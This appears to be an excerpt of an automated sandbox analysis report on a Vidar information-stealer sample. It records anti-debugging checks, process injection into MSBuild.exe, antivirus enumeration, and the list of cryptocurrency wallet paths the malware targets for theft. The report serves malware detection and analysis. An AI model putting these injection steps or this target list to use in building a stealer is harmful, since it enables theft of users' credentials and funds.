Source: Amcache.hve.1.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: DAKJDH.1.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: Amcache.hve.1.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: DAKJDH.1.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API call chain: ExitProcess graph end node	graph_1-69131
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API call chain: ExitProcess graph end node	graph_1-69147
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API call chain: ExitProcess graph end node	graph_1-70483

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0100D7C3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_0100D7C3

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

1_2_00418A63

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0101A39E mov eax, dword ptr fs:[00000030h]	0_2_0101A39E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01010C7E mov ecx, dword ptr fs:[00000030h]	0_2_01010C7E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01001FE0 mov edi, dword ptr fs:[00000030h]	0_2_01001FE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0102D36A mov eax, dword ptr fs:[00000030h]	0_2_0102D36A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0102D382 mov eax, dword ptr fs:[00000030h]	0_2_0102D382
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0102D38D mov eax, dword ptr fs:[00000030h]	0_2_0102D38D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0104458A mov eax, dword ptr fs:[00000030h]	0_2_0104458A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_004014AD mov eax, dword ptr fs:[00000030h]	1_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0040148A mov eax, dword ptr fs:[00000030h]	1_2_0040148A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_004014A2 mov eax, dword ptr fs:[00000030h]	1_2_004014A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_004186A9 mov eax, dword ptr fs:[00000030h]	1_2_004186A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_004186AA mov eax, dword ptr fs:[00000030h]	1_2_004186AA

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0101C99D GetProcessHeap,

0_2_0101C99D

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01007360 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_01007360
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0100D7C3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0100D7C3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_010077FF SetUnhandledExceptionFilter,	0_2_010077FF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01007672 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_01007672
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0041D12A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_0041D12A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0041DAAC _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_0041DAAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0042774E SetUnhandledExceptionFilter,	1_2_0042774E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C4CB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_6C4CB66C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C4CB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_6C4CB1F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C67AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_6C67AC62

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: file.exe PID: 5276, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 2000, type: MEMORYSTR

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\file.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write

Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 1_2_0040F54A _memset,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,ResumeThread,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,

1_2_0040F54A

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\file.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A

Jump to behavior

Searches for specific processes (likely to inject)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_004124A8 __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		1_2_004124A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0041257F __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		1_2_0041257F

Writes to foreign memory regions

Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 430000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 43D000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 670000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 671000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: B82008	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0102D01B cpuid

0_2_0102D01B

Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,	0_2_0101C15F
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_0101C1EA
Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,	0_2_0101C079
Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,	0_2_0101C0C4
Source: C:\Users\user\Desktop\file.exe	Code function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,__calloc_crt,_free,	0_2_010513E3
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_0101C566
Source: C:\Users\user\Desktop\file.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	0_2_01053576
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,	0_2_0101C43D
Source: C:\Users\user\Desktop\file.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_0101C73B
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,	0_2_0101C66C
Source: C:\Users\user\Desktop\file.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_free,_free,_free,_free,_free,_free,_free,_free,_free,	0_2_01056B40
Source: C:\Users\user\Desktop\file.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,	0_2_01055A50
Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,	0_2_01015ACF
Source: C:\Users\user\Desktop\file.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,	0_2_01055D6E
Source: C:\Users\user\Desktop\file.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	0_2_01054DC4
Source: C:\Users\user\Desktop\file.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	0_2_0101BDD7
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,	0_2_01015F79
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,	1_2_00410DDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	1_2_0042B1EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	1_2_0042B2E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,	1_2_00429B70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	1_2_0042B3E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	1_2_0042B388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,	1_2_0042AC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,	1_2_00425503
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	1_2_0042B5B4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,	1_2_004275BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: EnumSystemLocalesA,	1_2_0042B676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	1_2_00428EE4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,	1_2_00429E8E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,	1_2_0042E68F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	1_2_00427696
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	1_2_0042B6A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	1_2_0042B743
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	1_2_0042B707
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetLocaleInfoA,	1_2_0042E7C4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_01007565 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_01007565

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 1_2_00410C53 GetProcessHeap,HeapAlloc,GetUserNameA,

1_2_00410C53

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 1_2_00410D2E GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

1_2_00410D2E

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.1.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.1.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.1.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: MSBuild.exe, 00000001.00000002.3356483728.0000000000E98000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.1.dr	Binary or memory string: MsMpEng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected Vidar

Source: Yara match

File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 1.2.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.102cae0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.MSBuild.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.102cae0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.1000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 5276, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 2000, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: MSBuild.exe, 00000001.00000002.3356346368.0000000000CF0000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: electrum.*
Source: MSBuild.exe, 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda 